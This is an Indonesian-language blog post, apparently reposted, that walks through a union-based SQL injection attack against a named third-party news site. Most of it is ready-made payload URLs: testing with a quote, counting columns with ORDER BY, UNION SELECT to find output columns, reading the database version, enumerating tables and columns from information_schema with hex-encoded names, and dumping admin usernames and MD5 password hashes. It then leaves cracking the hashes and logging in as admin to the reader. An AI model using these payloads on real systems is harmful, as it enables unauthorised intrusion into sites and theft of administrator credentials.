Contoh SQL Injection

Contoh SQL Injection

264
0
SHARE

to the point.. talk less do more

target site:

http://www.itmaasia.com/news.php?id=10

udahnya kita test apakah target kita bisa di SQLi ato gk??
caranya cukup kasih tanda ( ‘ ) / petik satu dibelakang url jadinya

http://www.itmaasia.com/news.php?id=10

klo keluar tulisan error sql berarti webnya bisa di SQLi.

langkah berikutnya kita cari jumlah kolom. caranya make syntak

order by (jumlah kolom)–

kita terapkan pada site target jadinya

http://www.itmaasia.com/news.php?id=10 order by 300–

kalo ada tulisan :

Unknown column ‘300’ in ‘order clause’

itu berarti kolomnya kebanyakan kita pake ilmu ngira” jumlah kolomnya brp? harus pas misal kita kira¬≤ target kita punya kolom 26 sehingga

http://www.itmaasia.com/news.php?id=10 order by 26–

error tadi gk keluar.. kita coba lagi make kolom 27

http://www.itmaasia.com/news.php?id=10 order by 27–

dan lagi error gk kluar?? kita coba lagi make kolom 28

http://www.itmaasia.com/news.php?id=10 order by 28–

ternyata error keluar.. jadi kesimpulannya.. target kita tuh pny kolom 27 buah..

setelah kita dapet semua kolom kita urutkan kolom untuk mendapatkan “NOMOR AJAIB” caranya make syntak

depan id kasih tanda ( – )/kurang union select kolom1,2, n

penerapan dalam target kita

http://www.itmaasia.com/news.php?id=-10 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27–

maka akan muncul “NOMOR AJAIB” itulah nomor yang kita gunakan untuk inject (oh iya, nomor ajaib ini tidak hanya di badan web, tetapi bisa di title web)

di target kita ngeluarin angka 3 & 11

selanjutnya kita cari versi databasenya.. caranya make syntak

@@Version pada nomor ajaib

penerapan dalam target kita (gw ambil yg 11)

http://www.itmaasia.com/news.php?id=-10 union select 1,2,3,4,5,6,7,8,9,10,@@Version,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27–

muncul versi database
5.0.51b-community-nt

[quote]
catatan:
database versi 5, karena sebentar kita akan mencari informasi table dan column dari information_schema, dimana information_schema tidak terdapat di database versi 4, jadi kalau targetnya mempunyai database MySQL versi 4, yang kita lakukan yaitu menebak-nebak tablenya.[/quote]

langkah selanjutnya kita cari informasi table caranya

memasukkan perintah group_concat(table_name) didalam “angka ajaib” kemudian diakhir URL tambahkan from information_schema.tables where table_schema=database()–

penerapan dalam target kita

http://www.itmaasia.com/news.php?id=-10%20union%20select%201,2,3,4,5,6,7,8,9,10,group_concat(table_name),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27%20from%20information_schema.tables%20where%20table_schema=database()–

nah muncul kan nama² tabel nya ada tabel admin tuh

langkah selanjutnya kita akan mengintip informasi di dalam table admin,

pertama cek column dulu di table admin dengan perintah group_concat(column_name) dan diakhir URL tambahkan from information_schema.columns where table_name=’nama table’

penerapan dalam target kita

http://www.itmaasia.com/news.php?id=-10 union select 1,2,3,4,5,6,7,8,9,10,group_concat(column_name),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 from information_schema.columns where table_name=’tb_admin’–

oopppsss… error!
table ‘admin’ harus diconvert dulu ke hexa agar dapat dibaca oleh SQL..
dengan catatan, kita harus menambahkan 0x didepan hexa agar server dapat mengetahui bahwa itu telah diconvert ke hexa..

caranya masuk ke web ini
http://www.swingnote.com/tools/texttohex.php

trus di kolom string tulis tb_admin kemudian convert
kemudian copy hexnya. lalu kita terapkan pada target kita

http://www.itmaasia.com/news.php?id=-10%20union%20select%201,2,3,4,5,6,7,8,9,10,group_concat(column_name),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27%20from%20information_schema.columns%20where%20table_name=0x74625f61646d696e

keluarkan informasi dari tb_admin..
langkah selanjutnya kita cari id_admin & password caranya

group_concat(username,0x3a,password) tambahkan diakhir URL from admin

dimana 0x3a adalah tanda : yang telah diconvert ke hexa, agar format tampilannya username:password, dan command from admin adalah untuk menjalankan perintah untuk mengambil informasi dari table yang bernama admin..

penerapan dalam target kita

http://www.itmaasia.com/news.php?id=-10 union select 1,2,3,4,5,6,7,8,9,10,group_concat(username,0x3a,password),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 from tb_admin

wakakakakkak… dapet dech informasi login admin dan passwordnya..
sekarang kita akan login sebagai admin, namun user admin telah terenkripsi dengan MD5. cari dah cracknya……

selanjutnya terserah anda..

segala akibat ditanggung sendiri”..

Sumber Tecon Indonesia

NO COMMENTS

LEAVE A REPLY